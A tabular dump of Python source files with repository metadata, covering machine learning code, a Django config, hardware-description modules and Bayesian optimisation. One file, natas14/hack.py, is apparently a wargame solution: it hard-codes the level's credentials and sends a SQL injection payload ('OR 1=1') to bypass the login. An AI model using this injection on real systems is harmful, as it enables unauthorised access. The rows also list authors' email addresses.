blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c4963b958ee261772f4dc13bfa08cfd29b9b4df6
|
d2b5a35ff2726cec0c215c13baec499847ac7436
|
/perceptron/perceptron.py
|
c71b519591f5b5f95f2a3748a301e6b4c9c75668
|
[] |
no_license
|
samantamrityunjay/ML-from-scratch
|
ec9c1bbd57b0650a79822b7bdbeece9c7dcfb0f1
|
d50283288e1aa0e14d021b603ba77368bd745e6e
|
refs/heads/main
| 2023-02-19T10:19:14.718420
| 2021-01-19T14:49:00
| 2021-01-19T14:49:00
| 329,615,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
import numpy as np
class Perceptron:
def __init__(self, lr=0.01, n_iters=1000):
self.lr = lr
self.n_iters = n_iters
self.activation_func = self._unit_step_func
self.weights = None
self.bias = None
def fit(self,X,y):
n_samples, n_features = X.shape
#init weights
self.weights = np.zeros(n_features)
self.bias = 0
y_ = np.array([1 if i>0 else 0 for i in y])
for _ in range(self.n_iters):
for idx, x_i in enumerate(X):
linear_output = np.dot(x_i, self.weights) +self.bias
y_predicted = self.activation_func(linear_output)
update = self.lr *(y_[idx] - y_predicted)
self.weights+=update*x_i
self.bias+=update
def predict(self,X):
linear_output = np.dot(X,self.weights) +self.bias
y_predicted = self.activation_func(linear_output)
return y_predicted
def _unit_step_func(self,x):
return np.where(x>=0,1,0)
|
[
"samantamrityunjay98@gmail.com"
] |
samantamrityunjay98@gmail.com
|
a39a865abd1b554b5a97e02ea4e134a717db67fb
|
6d710a4d8a856e8c197ce930f50bf5023f12cc69
|
/app/database/base.py
|
0ce1a84a1fe73c2e7d65b5f087551ac122423693
|
[] |
no_license
|
saikiranreddyyarava/API-implementation-using-GraphQL
|
30013e0bacbe9198e52ab18c63ba770507f3d0d1
|
d86e31cc7d9df145a58892b340136c4d23d12682
|
refs/heads/master
| 2023-05-24T20:30:24.188638
| 2020-06-11T10:43:00
| 2020-06-11T10:43:00
| 267,617,584
| 0
| 0
| null | 2023-05-22T23:30:37
| 2020-05-28T14:50:53
|
Python
|
UTF-8
|
Python
| false
| false
| 717
|
py
|
import os
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker
# Create database engine
db_name = 'database.db'
db_path = os.path.join(os.path.dirname(__file__), db_name)
db_uri = 'sqlite:///{}'.format(db_path)
engine = create_engine(db_uri, convert_unicode=True)
# Declarative base model to create database tables and classes
Base = declarative_base()
Base.metadata.bind = engine # Bind engine to metadata of the base class
# Create database session object
db_session = scoped_session(sessionmaker(bind=engine, expire_on_commit=False))
Base.query = db_session.query_property() # Used by graphql to execute queries
|
[
"kiranreddyyarava@gmail.com"
] |
kiranreddyyarava@gmail.com
|
8aa012ab93d1849ae33f7995f1509da4a0a3fe20
|
6f9a5717fed38b0a79c399f7e5da55c6a461de6d
|
/Programmers/Graph/FarthestNode.py
|
f261f2fbb6a0f8e8e24688a1a52e9fb5a8351bba
|
[] |
no_license
|
Alfred-Walker/pythonps
|
d4d3b0f7fe93c138d02651e05ca5165825676a5e
|
81ef8c712c36aa83d1c53aa50886eb845378d035
|
refs/heads/master
| 2022-04-16T21:34:39.316565
| 2020-04-10T07:50:46
| 2020-04-10T07:50:46
| 254,570,527
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
from collections import deque
def get_adjacent(n, edge):
adjacent_list = dict()
for i in range(1, n + 1):
adjacent_list[i] = []
for e in edge:
start = e[0]
end = e[1]
if end not in adjacent_list[start]:
adjacent_list[start].append(end)
if start not in adjacent_list[end]:
adjacent_list[end].append(start)
return adjacent_list
def solution(n, edge):
adjacent_list = get_adjacent(n, edge)
min_dist = dict()
queue = deque()
queue.append((1, 0))
visited = [False] * (n + 1)
visited[1] = True
while len(queue) != 0:
q = queue.popleft()
for adj in adjacent_list[q[0]]:
if visited[adj]:
continue
dist = q[1] + 1
min_dist[adj] = dist
visited[adj] = True
queue.append((adj, dist))
# print(min_dist.items())
sorted_list = sorted(min_dist.items(), key=lambda x: x[1], reverse=True)
# print(sorted_list)
farthest = sorted_list[0][1]
answer = 0
for s in sorted_list:
if s[1] == farthest:
answer += 1
else:
break
return answer
n = 5
edge = [[1, 4], [2, 3], [4,5]]
print(solution(n, edge))
|
[
"studio.alfred.walker@gmail.com"
] |
studio.alfred.walker@gmail.com
|
8f544a5feb3ff254089a1fedc19a6c8d98ab7fad
|
65f1c703905d6c9a44a86c694d0281665b7e9a90
|
/EJERCICIOS EN CLASE/18.08.2021/text.py
|
093bff2e04a7bac91803ac5d609ca5b6a6d3a795
|
[] |
no_license
|
JosueSalgado01/Python
|
1b1fb85386a9192f14708b604e29418f7da344bc
|
b72fce05155915e3e2eedd88caa81ebbb5830f86
|
refs/heads/main
| 2023-07-12T07:44:24.816992
| 2021-08-26T17:06:03
| 2021-08-26T17:06:03
| 399,242,618
| 0
| 0
| null | 2021-08-23T21:20:42
| 2021-08-23T20:43:06
| null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 18 08:54:27 2021
@author: Dell
"""
pi=22/7
print(pi)
print("{:.3f}".format(pi))
print("{:.2f}".format(pi))
print("{:.54f}".format(pi))
va=25/5
print(va)
print("")
|
[
"noreply@github.com"
] |
JosueSalgado01.noreply@github.com
|
58f433d9a2e0696e418204f53be23a1bc7ba976a
|
54b238d50baee4f483c0690d77d106ebc30a4c0a
|
/aetherling/space_time/modules/higher_order.py
|
3012f34c5022b4b750e4f5bba8e45f554c96eae5
|
[
"MIT"
] |
permissive
|
David-Durst/aetherling
|
4a5d663a98428769834e8ebbf7e9b63cb7788319
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
refs/heads/master
| 2021-08-16T01:48:20.476097
| 2020-06-19T19:25:46
| 2020-06-19T19:25:46
| 114,405,958
| 10
| 1
|
MIT
| 2021-03-29T17:44:39
| 2017-12-15T19:46:51
|
Python
|
UTF-8
|
Python
| false
| false
| 9,198
|
py
|
from aetherling.space_time.space_time_types import *
from aetherling.space_time.type_helpers import valid_ports, strip_tseq_1_0_sseq_1, strip_tseq_1_n_sseq_1, \
num_nested_space_layers, replace_atom_tuple_with_t0, time_last_valid
from aetherling.space_time.nested_counters import DefineNestedCounters
from aetherling.modules.map_fully_parallel_sequential import DefineNativeMapParallel
from aetherling.modules.reduce import DefineReduceParallel, DefineReduceSequential, tupleToTwoInputsForReduce
from aetherling.modules.initial_delay_counter import InitialDelayCounter
from aetherling.modules.term_any_type import TermAnyType
from aetherling.helpers.nameCleanup import cleanName, undup_
from magma import *
from mantle.coreir.arith import *
from mantle.coreir.logic import *
from mantle.coreir.compare import *
from mantle.coreir import DefineCoreirConst, DefineRegister
from magma.circuit import DefineCircuitKind
from aetherling.modules.register_any_type import DefineRegisterAnyType
int_width = ST_Int().magma_repr().size()
bit_width = ST_Bit().magma_repr().size()
@cache_definition
def DefineMap_S(n: int, op: DefineCircuitKind, has_valid=True) -> DefineCircuitKind:
assert op.binary_op == False
map_s = DefineNativeMapParallel(n, op, True, has_ready=False, has_valid=has_valid)
map_s.binary_op = False
map_s.st_in_t = [ST_SSeq(n, op.st_in_t[0])]
map_s.st_out_t = ST_SSeq(n, op.st_out_t)
return map_s
@cache_definition
def DefineMap2_S(n: int, op: DefineCircuitKind, has_valid=True) -> DefineCircuitKind:
assert op.binary_op == True
map_s = DefineNativeMapParallel(n, op, True, has_ready=False, has_valid=has_valid)
map_s.binary_op = True
map_s.st_in_t = [ST_SSeq(n, op.st_in_t[0]), ST_SSeq(n, op.st_in_t[1])]
map_s.st_out_t = ST_SSeq(n, op.st_out_t)
return map_s
@cache_definition
def DefineMap_T(n: int, inv: int, op: DefineCircuitKind) -> DefineCircuitKind:
assert op.binary_op == False
return DefineMap_T_1_or_2(n, inv, op, True)
@cache_definition
def DefineMap2_T(n: int, inv: int, op: DefineCircuitKind) -> DefineCircuitKind:
assert op.binary_op == True
return DefineMap_T_1_or_2(n, inv, op, False)
@cache_definition
def DefineMap_T_1_or_2(n: int, inv: int, op: DefineCircuitKind, is_unary: bool) -> DefineCircuitKind:
class _Map_T(Circuit):
name = undup_("Map_T_n{}_i{}".format(str(n), str(inv)).replace("__","_"))
op_num_ports = len(op.IO.Decl) // 2
op_port_names = op.IO.Decl[::2]
op_port_types = op.IO.Decl[1::2]
non_clk_ports = []
for i in range(op_num_ports):
if (op_port_names[i] is 'CLK'):
continue
non_clk_ports += [op_port_names[i], op_port_types[i]]
IO = non_clk_ports + ClockInterface(has_ce=False, has_reset=False)
binary_op = not is_unary
if is_unary:
st_in_t = [ST_TSeq(n, inv, op.st_in_t[0])]
else:
st_in_t = [ST_TSeq(n, inv, op.st_in_t[0]), ST_TSeq(n, inv, op.st_in_t[1])]
st_out_t = ST_TSeq(n, inv, op.st_out_t)
@classmethod
def definition(cls):
op_instance = op()
for i in range(cls.op_num_ports):
port_name = cls.op_port_names[i]
wire(getattr(cls, port_name), getattr(op_instance, port_name))
return _Map_T
@cache_definition
def DefineReduce_S(n: int, op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Reduce_S(Circuit):
assert type(strip_tseq_1_n_sseq_1(op.st_in_t[0])) == ST_Atom_Tuple
name = "Reduce_S_n{}".format(str(n))
binary_op = False
st_in_t = [ST_SSeq(n, replace_atom_tuple_with_t0(op.st_in_t[0]))]
st_out_t = ST_SSeq(1, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())] + ClockInterface()
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_renamed = tupleToTwoInputsForReduce(op, num_nested_space_layers(cls.st_in_t[0]) - 1)
reduce = DefineReduceParallel(n, op_renamed)()
wire(cls.I, reduce.I)
red_reg = DefineRegisterAnyType(cls.st_out_t.magma_repr())()
wire(reduce.O, red_reg.I[0])
wire(cls.O, red_reg.O)
if has_valid:
valid_reg = DefineRegister(1)()
wire(cls.valid_up, valid_reg.I[0])
wire(valid_reg.O[0], cls.valid_down)
return _Reduce_S
@cache_definition
def DefineReduce_T(n: int, i: int, op: DefineCircuitKind) -> DefineCircuitKind:
class _Reduce_T(Circuit):
# second case handles partially parallel generated code where reduce over a map_s 1
assert type(strip_tseq_1_n_sseq_1(op.st_in_t[0])) == ST_Atom_Tuple
name = "Reduce_T_n{}_i{}".format(str(n), str(i))
binary_op = False
st_in_t = [ST_TSeq(n, i, replace_atom_tuple_with_t0(op.st_in_t[0]))]
st_out_t = ST_TSeq(1, n+i-1, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())] + valid_ports + ClockInterface()
@classmethod
def definition(cls):
red_reg = DefineRegisterAnyType(cls.st_out_t.magma_repr())()
if n > 1:
op_renamed = tupleToTwoInputsForReduce(op, num_nested_space_layers(cls.st_in_t[0]))
reduce = DefineReduceSequential(n, op_renamed, has_ce=True)()
enable_counter = DefineNestedCounters(cls.st_in_t[0],
has_last=False,
has_ce=True)()
wire(enable_counter.valid, reduce.CE)
wire(cls.valid_up, enable_counter.CE)
wire(cls.I, reduce.I)
wire(reduce.out, red_reg.I)
else:
wire(cls.I, red_reg.I)
wire(cls.O, red_reg.O)
# valid output after first full valid input collected
valid_delay = InitialDelayCounter(time_last_valid(cls.st_in_t[0]) + 1)
wire(cls.valid_up, valid_delay.CE)
wire(cls.valid_down, valid_delay.valid)
if n > 1:
# ignore inner reduce ready and valid
wire(reduce.valid, TermAnyType(Bit).I)
wire(reduce.ready, TermAnyType(Bit).I)
return _Reduce_T
@cache_definition
def DefineAdd_1_S(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Add_1_S(Circuit):
name = "Add_1_S"
binary_op = False
st_in_t = op.st_in_t
st_out_t = ST_SSeq(1, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I, op_inst.I)
wire(cls.O[0], op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Add_1_S
@cache_definition
def DefineRemove_1_S(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Remove_1_S(Circuit):
name = "Remove_1_S"
binary_op = False
st_in_t = [ST_SSeq(1, op.st_in_t[0])]
st_out_t = op.st_out_t
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I[0], op_inst.I)
wire(cls.O, op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Remove_1_S
@cache_definition
def DefineAdd_1_0_T(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Add_1_0_T(Circuit):
name = "Add_1_S"
binary_op = False
st_in_t = op.st_in_t
st_out_t = ST_TSeq(1, 0, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I, op_inst.I)
wire(cls.O, op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Add_1_0_T
@cache_definition
def DefineRemove_1_0_T(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Remove_1_0_T(Circuit):
name = "Remove_1_S"
binary_op = False
st_in_t = [ST_TSeq(1, 0, op.st_in_t[0])]
st_out_t = op.st_out_t
IO = ['I', In(st_in_t.magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I, op_inst.I)
wire(cls.O, op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Remove_1_0_T
|
[
"davidbdurst@gmail.com"
] |
davidbdurst@gmail.com
|
84dafa68320203f48c3ca3f663ff1ee69c66ad13
|
134533df11f19ff03c4babfdc800c2db20bb013c
|
/image_upload_app/asgi.py
|
e944226e506abd82395c7a113d43bc630ac26256
|
[] |
no_license
|
deepak78194/image_upload
|
711617e35181466b5b14e049dbe1083d9c820582
|
37b2b37a191bd6a1d29e2155a507746d9b602b9a
|
refs/heads/master
| 2023-03-26T22:48:28.486368
| 2021-03-31T08:03:27
| 2021-03-31T08:03:27
| 353,254,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
ASGI config for image_upload_app project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'image_upload_app.settings')
application = get_asgi_application()
|
[
"deepak78194@gmail.com"
] |
deepak78194@gmail.com
|
effed3a0acdca44801bad039f99958bf2a182ddc
|
001280151943b24db75e68fbbc0d43df82a3579d
|
/modules/EBO/ebo_CV.py
|
a582d3a09617a8a735e460b616baf4fb4e7fed61
|
[] |
no_license
|
federicovitti/DIVIDE_et_CONQUER-bayes_opt
|
67e4853e59c5e718676f189ba73bb6a552cf471d
|
e5388ad2c0f5458d367aeefe9ce0fd6af2ec1335
|
refs/heads/master
| 2021-05-01T18:56:26.976064
| 2018-02-10T13:00:36
| 2018-02-10T13:00:36
| 121,011,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,048
|
py
|
import numpy as np
import helper_ebo as helper
import time
from mypool import MyPool
from mondrian import MondrianTree
import os
try:
import cPickle as pickle
except:
import pickle
from representation import DenseL1Kernel
import scipy.linalg
import logging
'''
Emsemble Bayesian Optimization
'''
class ebo(object):
def __init__(self, f, options):
check_valid_options(options)
self.f = f
self.options = options
self.all_besty = list()
# initialization
if 'X' in options and 'y' in options:
X, y = options['X'], options['y']
self.opt_value = y.max()
self.options['max_value'] = self.opt_value
else:
X, y = np.empty((0, options['dx'])), np.empty((0, 1))
self.X, self.y = X.copy(), y.copy()
options['X'], options['y'] = None, None
# parallel pool
self.pool = MyPool(options['pid'], options['datadir'], options['useAzure'], options['thresAzure'])
# hyper parameters
if 'z' in options and 'k' in options:
self.z, self.k = options['z'], options['k']
else:
self.z, self.k = None
# for timing
self.timing = []
self.variance = options['gp_sigma'] ** 2
def get_params(self):
all_params = ['x_range', 'T', 'B', 'dim_limit', 'min_leaf_size', 'max_n_leaves', 'n_bo', 'n_top']
return [self.options[t] for t in all_params]
def run(self,):
x_range, T, B, dim_limit, min_leaf_size, max_n_leaves, n_bo, n_top = self.get_params()
tstart = self.X.shape[0]/B
tot_time = np.empty(T)
bestnewY = np.empty(T)
simple_regret = np.empty(T)
for t in range(T):
init_time = time.time()
self.options['t'] = t
ref = self.y.min() if self.y.shape[0]>0 else None
self.tree = MondrianTree(self.X, self.y, x_range, max_n_leaves, reference=ref)
leaves = self.tree.grow_tree(min_leaf_size= min_leaf_size)
tot_eval = np.ceil(2.0*B)
# this might be dangerous if high dimension and R>1
tot_volumn = np.array([n.volumn for n in leaves]).sum()
parameters = [[0, n.X, n.y, n.x_range, False, np.maximum(n_bo, np.ceil((tot_eval*n.volumn/tot_volumn)).astype(int)), self.options] for n in leaves]
# run bo learning in parallel
res = self.pool.map(parameters, 'iter' + str(t))
# allocate worker budget
newX, newacf, z_all, k_all, besty_all = zip(*res)
self.opt_value = besty_all[0]
# sync hyper parameters
if len(z_all) == 1:
logging.error(z_all)
self.z = np.array(z_all[0])
for zz in z_all:
if zz.size != x_range.shape[1]:
print ('zz wrong size?')
print (zz)
assert 0 == 1
if self.options['gibbs_iter'] != 0:
self.z = helper.mean_z(np.array(z_all), dim_limit)
self.k = np.mean(k_all, axis=0).astype(int)
# get newX
newX = np.vstack(newX)
newacf = np.hstack(newacf)
newX = self.choose_newX(newX, newacf, n_top, B)
# map again
parameters = [[self.f, self.X, self.y, x_range, True, [x], self.options] for x in newX]
newY = self.pool.map(parameters, 'eval' + str(t), not self.options['func_cheap'])
bestnewY[t] = np.asarray(newY).max()
# update X, y
self.X = np.vstack((self.X, newX))
self.y = np.vstack((self.y, newY))
self.print_step(newX, t)
bestx, besty, cur = self.get_best()
simple_regret[t] = -besty - self.options['f.min']
if t == 0: tot_time[t] = time.time() - init_time
else: tot_time[t] = tot_time[t-1] + time.time()-init_time
return -bestnewY, simple_regret, tot_time
def choose_newX(self, newX, newacf, n_top, B):
inds = newacf.argsort()
if 'heuristic' in self.options and self.options['heuristic']:
n_top = np.ceil(B/2).astype(int)
inds_of_inds = np.hstack((range(n_top), np.random.permutation(range(n_top,len(inds)))))
newX = newX[inds[inds_of_inds[:B]]]
return newX
good_inds = [inds[0]]*B
len_inds = len(inds)
jbest = 0
maxjbest = 0
next_ind = 1
all_candidates = np.arange(1, len_inds)
kern = DenseL1Kernel(self.z, self.k)
rec = []
while next_ind < B:
jnext = maxjbest + n_top
candidates = all_candidates[:jnext]
assert len(candidates) > 0, 'B > number of selections?'
maxlogdet = -np.float('inf')
jbest = -1
curX = newX[good_inds[:next_ind]]
Ky = kern(curX) + self.variance*np.eye(curX.shape[0])
# compute K + sigma^2I inverse
factor = scipy.linalg.cholesky(Ky)
for j in candidates:
cur_ind = inds[j]
marginal = self.compute_marginal_det(curX, newX[cur_ind], factor, kern) - newacf[j]
if maxlogdet < marginal:
maxlogdet = marginal
jbest = j
if jbest > maxjbest:
maxjbest = jbest
good_inds[next_ind] = inds[jbest]
all_candidates = all_candidates[all_candidates != jbest]
next_ind += 1
rec.append(marginal)
return newX[good_inds]
def compute_marginal_det(self, X, xx, factor, kern):
kXn = np.array(kern(xx, X))
det = np.log(kern.xTxNorm - kXn.dot(scipy.linalg.cho_solve((factor, False), kXn.T)).sum())
return det
def get_best(self):
cur = self.y.argmax(axis=0)
self.bestx = self.X[cur]
self.besty = self.f(self.bestx.ravel())
self.all_besty.append(self.besty)
return self.bestx, self.besty, cur
def print_step(self, newX, t):
# if self.options['isplot']:
# plot_ebo(self.tree, newX, t)
bestx, besty, cur = self.get_best()
self.options['opt_value'] = self.y.max()
return bestx, besty
def reload(self):
fnm = self.options['save_file_name']
if not os.path.isfile(fnm):
return False
self.X, self.y, self.z, self.k, self.timing = pickle.load(open(fnm))
print ('Successfully reloaded file.')
# This will save the pool workers
def pause(self):
self.pool.delete_containers()
# Don't call this for our experiments!! It will release all the workers.
def end(self):
self.pool.end()
def save(self):
fnm = self.options['save_file_name']
dirnm = os.path.dirname(fnm)
if not os.path.exists(dirnm):
os.makedirs(dirnm)
pickle.dump([self.X, self.y, self.z, self.k, self.timing], open(fnm, 'wb'))
# print ('saving file... ', time.time() - start, ' seconds')
def check_valid_options(options):
all_params = ['x_range', 'dx', 'max_value', \
'T', 'B', 'dim_limit', 'isplot', 'z', 'k', 'alpha', 'beta', \
'opt_n', 'pid', 'datadir', 'gibbs_iter', 'useAzure', 'n_add', \
'gp_type', 'gp_sigma', 'n_bo', 'n_top', 'min_leaf_size', 'func_cheap', 'thresAzure', 'save_file_name']
for a in all_params:
assert a in options, a + ' is not defined in options.'
assert options['x_range'].shape[1] == options['dx'], 'x_range and dx mismatched.'
if 'X' in options:
assert 'y' in options, 'y undefined.'
assert options['X'].shape[0] == options['y'].shape[0], 'X, y size mismatched.'
assert options['y'].shape[1] == 1, 'y should be n x 1 matrix.'
assert options['X'].shape[1] == options['dx'], 'X should be n x dx matrix.'
# check for gibbs
beta, alpha, x_range, n_add = options['beta'], options['alpha'], options['x_range'], options['n_add']
dim_limit = options['dim_limit']
options['n_add'] = options['dx'] if n_add is None else n_add
n_add = options['n_add']
options['dim_limit'] = options['dx'] if dim_limit is None else dim_limit
assert beta.dtype == float, 'Forgot to set beta to be float?'
assert isinstance(alpha, float) or alpha.dtype == float, 'Forgot to set alpha to be float?'
assert x_range.dtype == float, 'Forgot to set x_range to be float?'
assert len(x_range) == 2 and len(x_range[0]) == len(x_range[1]), 'x_range not well defined'
if isinstance(alpha, int) or isinstance(alpha, float):
options['alpha'] = np.array([alpha*1.0]*n_add)
assert options['alpha'].shape[0] == n_add, 'alpha must be of size n_add'
assert options['k'] is None or np.min(options['k']) >= 2, 'number of tiles must be at least 2'
|
[
"noreply@github.com"
] |
federicovitti.noreply@github.com
|
de0872d64dc2b87a12bd051728b834cdf5b98547
|
c7e98347dc9ef53ba73da90a7aa20792bd359a8e
|
/natas14/hack.py
|
647d2cb931c80df4b20291ba17e866e1eb05f73c
|
[] |
no_license
|
prp-e/natas_challenges
|
66f74226465d344a149a42dded667574fa8842cd
|
2d8947fcdb3950a1290db26b36153fd2b8032b58
|
refs/heads/master
| 2023-01-22T15:59:37.660885
| 2020-12-06T12:06:09
| 2020-12-06T12:06:09
| 319,023,876
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
import requests
username = "natas14"
password = "Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1"
url = "http://natas14.natas.labs.overthewire.org/"
session = requests.Session()
response = session.post(url, data = {"username" : 'salam" OR 1=1 #', "password": "banoo"}, auth=(username, password))
print(response.text)
|
[
"haghiri75@gmail.com"
] |
haghiri75@gmail.com
|
d76016d30946dc67e8f8300c99c8741073113505
|
35de5c22deac4780daefe6b0f5087886dde66996
|
/tests/resources/test_resource.py
|
7c6716fd154c14c36af5274f346e6947f96a79bf
|
[
"MIT"
] |
permissive
|
cieplak/premo
|
7b7705a5da453cab9fa8f524d657112d746f2090
|
805714d8797a39e6dd8fc85203843d2fb67054a4
|
refs/heads/master
| 2021-01-21T03:13:36.192527
| 2015-10-21T00:11:18
| 2015-10-21T00:11:18
| 35,082,684
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 805
|
py
|
import json
import flask
import premo
from tests import TestCase
class TestResource(TestCase):
def test_resource(self):
post_response = self.client.post(
flask.url_for('resource.create'),
data=json.dumps(dict(value='binary blob')),
content_type=premo.mimes.Json.content_type
)
self.assertEqual(post_response.status_code, 201)
body = json.loads(post_response.data)
# Validate schema
premo.resources.resource.Resource(**body)
get_response = self.client.get(
flask.url_for('resource.read', id=body['id'])
)
self.assertEqual(get_response.status_code, 200)
body = json.loads(get_response.data)
# Validate schema
premo.resources.resource.Resource(**body)
|
[
"patrick@ldgr.io"
] |
patrick@ldgr.io
|
bb74fb6a0619e14a1a42f58aace7e9920ce74d0f
|
18eac94ff076c1eecd72870ef93ae656906e8673
|
/supervised_learning/0x03-optimization/14-batch_norm.py
|
56b841675b9c90640609d5f43ad97d0601a56297
|
[] |
no_license
|
dgquintero/holbertonschool-machine_learning
|
c1331ff87e053f9c143a0e503e8db177dfc7aafe
|
c80073d0ef68deeedbe2d991e296ef75f58a220f
|
refs/heads/master
| 2022-12-19T21:49:10.581793
| 2020-10-15T14:56:22
| 2020-10-15T14:56:22
| 279,329,167
| 0
| 1
| null | 2020-09-25T19:11:52
| 2020-07-13T14:42:03
|
Python
|
UTF-8
|
Python
| false
| false
| 1,179
|
py
|
#!/usr/bin/env python3
"""create_batch_norm_layer function"""
import tensorflow as tf
def create_batch_norm_layer(prev, n, activation):
"""
creates a batch normalization layer for a NN
Arguments:
prev: is the activated output of the previous layer
n: is the number of nodes in the layer to be created
activation: is the activation function
Returns: tensor of the activated output for the layer
"""
init = tf.contrib.layers.variance_scaling_initializer(mode="FAN_AVG")
x = tf.layers.Dense(units=n, activation=None, kernel_initializer=init)
x_prev = x(prev)
scale = tf.Variable(tf.constant(1.0, shape=[n]), name='gamma')
mean, variance = tf.nn.moments(x_prev, axes=[0])
beta = tf.Variable(tf.constant(0.0, shape=[n]), name='beta')
epsilon = 1e-8
normalization = tf.nn.batch_normalization(x_prev,
mean,
variance,
beta,
scale,
epsilon)
return activation(normalization)
|
[
"dgquintero02@hotmail.com"
] |
dgquintero02@hotmail.com
|
bb46be63f9d1cdf94fd65e570db8ba625ebc5aa6
|
afeebc0d22854f902ca19749a9ffb67903676b1f
|
/blog_project/blog_project/urls.py
|
1ebd317125d4a1574c4bbebcaafd602537b75263
|
[] |
no_license
|
sachinmukati/blog_project
|
3099f35c0907c2af06337e6f23f75b2ef4a40371
|
fca9826ad37e9ded8034f7c650e86e0fa5286167
|
refs/heads/master
| 2020-05-31T15:07:05.323105
| 2019-06-05T07:31:01
| 2019-06-05T07:31:01
| 190,348,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
"""blog_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from blog import views
urlpatterns = [
path('admin/', admin.site.urls),
path("",views.post_list_view ,name="post_list"),
path("post/<int:year>/<int:month>/<int:day>/<slug:slug>",views.post_detail_view, name="post_detail")
]
|
[
"sachinmukati47@gmail.com"
] |
sachinmukati47@gmail.com
|
7bc1327530d462d815ff6112d9610deb874945d7
|
e773ad635ae390edf5dea09195b33672c6597dbe
|
/tfmiss/training/bucket.py
|
2ebf4389c1f2a223d1ef60f9118b9dd8c27d71c4
|
[
"MIT"
] |
permissive
|
Viach/tfmiss
|
3e6c85b097140e29d60203d82361c14900ea09f4
|
5be62b8eb43c886746235d8d7d9370ff8e6d5a3a
|
refs/heads/master
| 2021-01-02T21:04:48.512102
| 2020-01-05T10:59:01
| 2020-01-05T10:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,677
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from collections import Counter
def init_buckets(len2freq):
"""Splits length-to-frequency mapping into list of initial buckets.
Args:
len2freq: Dict of `sequence length`: `frequency`.
Returns:
List of buckets. Each bucket is a tuple (`bucket boundary`, `subset of len2freq`).
"""
source = Counter(len2freq)
if not len(source):
raise ValueError('Empty length-to-frequency map')
if not all(map(lambda x: isinstance(x, int), source.keys())):
raise ValueError('Keys of length-to-frequency must be integers')
if not all(map(lambda x: isinstance(x, int), source.values())):
raise ValueError('Values of length-to-frequency must be integers')
denominator = 8
lengths = sorted(source.keys())
buckets = []
for lng in lengths:
b = int(np.ceil(lng / denominator)) * denominator + 1
if not len(buckets) or buckets[-1][0] != b:
buckets.append((b, {}))
